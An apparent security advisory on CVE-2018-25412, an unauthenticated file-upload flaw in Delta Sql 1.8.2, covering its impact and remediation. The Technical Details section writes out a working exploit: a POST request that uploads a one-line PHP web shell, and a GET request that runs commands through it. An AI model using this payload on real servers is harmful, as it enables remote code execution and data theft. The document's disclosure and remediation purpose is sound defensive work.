CVE-2018-25412: Arbitrary File Upload in Delta Sql 1.8.2
A critical arbitrary file upload vulnerability originally discovered in 2018 has been formally assigned as CVE-2018-25412 and catalogued in the NVD database with a CVSS score of 9.8 (Critical). The flaw affects Delta Sql version 1.8.2, a PHP-based SQL administration tool.
The vulnerability allows unauthenticated attackers to upload arbitrary files — including PHP web shells — by sending crafted POST requests to the docs_upload.php endpoint. Once uploaded, these files can be executed by the web server, resulting in remote code execution (RCE) with the privileges of the web server process.
Vulnerability Overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2018-25412 |
| CVSS Score | 9.8 (Critical) |
| CWE Classification | CWE-434 — Unrestricted Upload of File with Dangerous Type |
| Affected Software | Delta Sql 1.8.2 |
| Attack Vector | Network |
| Authentication Required | None (unauthenticated) |
| NVD Published | May 30, 2026 |
| Original Flaw Discovery | 2018 |
Technical Details
The vulnerability exists in docs_upload.php, which processes multipart form data for file uploads without validating the file type, extension, or content. An unauthenticated attacker can send a crafted POST request with a malicious PHP file disguised as a document upload.
Example attack vector:
POST /docs_upload.php
Content-Type: multipart/form-data; boundary=----Boundary
------Boundary
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/octet-stream
<?php system($_GET['cmd']); ?>
------Boundary--
After upload, the PHP file is accessible in the upload directory and can be executed directly:
GET /upload/shell.php?cmd=whoami
Successful exploitation allows an attacker to:
- Execute arbitrary commands on the server with web server privileges
- Read sensitive files including database credentials, configuration files, and source code
- Establish persistent access by planting additional web shells or backdoors
- Pivot to internal network resources accessible from the compromised server
- Escalate privileges if local privilege escalation vulnerabilities are also present
Context and Impact
Delta Sql is a PHP-based database management interface primarily used by developers and administrators as a lightweight alternative to phpMyAdmin. Version 1.8.2 is a legacy release and is unlikely to be widely deployed in production environments in 2026. The late NVD publication of this 2018 vulnerability reflects ongoing efforts to formally catalogue legacy security flaws.
Who is affected:
- Self-hosted Delta Sql 1.8.2 installations exposed to the internet
- Development environments running outdated Delta Sql instances
- Any web hosting environments where Delta Sql 1.8.2 was bundled with web applications
Practical risk: The CVSS 9.8 score reflects the maximum severity: unauthenticated, network-exploitable, and resulting in full system compromise. Any public-facing installation of Delta Sql 1.8.2 should be considered fully compromised if accessible without authentication.
Remediation
- Upgrade or decommission — update Delta Sql to a patched version or replace with a maintained database administration tool such as phpMyAdmin or Adminer
- Restrict network access — place database administration interfaces behind VPN or IP allowlisting; these tools should never be internet-facing
- Validate file uploads — any custom fork should implement strict allowlisting of permitted file extensions and MIME type validation before accepting uploads
- Scan for existing shells — audit the upload directory for any existing PHP files that may have been placed by prior exploitation
Secure upload pattern:
// Vulnerable pattern
move_uploaded_file($_FILES['file']['tmp_name'], 'uploads/' . $_FILES['file']['name']);
// Secure pattern — extension allowlist
$allowed = ['pdf', 'doc', 'txt'];
$ext = strtolower(pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION));
if (!in_array($ext, $allowed)) {
die('File type not permitted');
}
move_uploaded_file($_FILES['file']['tmp_name'], 'uploads/' . basename($_FILES['file']['name']));Key Takeaways
- CVE-2018-25412 is a CVSS 9.8 Critical arbitrary file upload flaw in Delta Sql 1.8.2, now formally catalogued in NVD
- No authentication required — any attacker with network access to the endpoint can upload and execute PHP files
- Full RCE — successful exploitation gives command execution with web server privileges
- Remediation: Upgrade to a patched version, restrict network access, or decommission the installation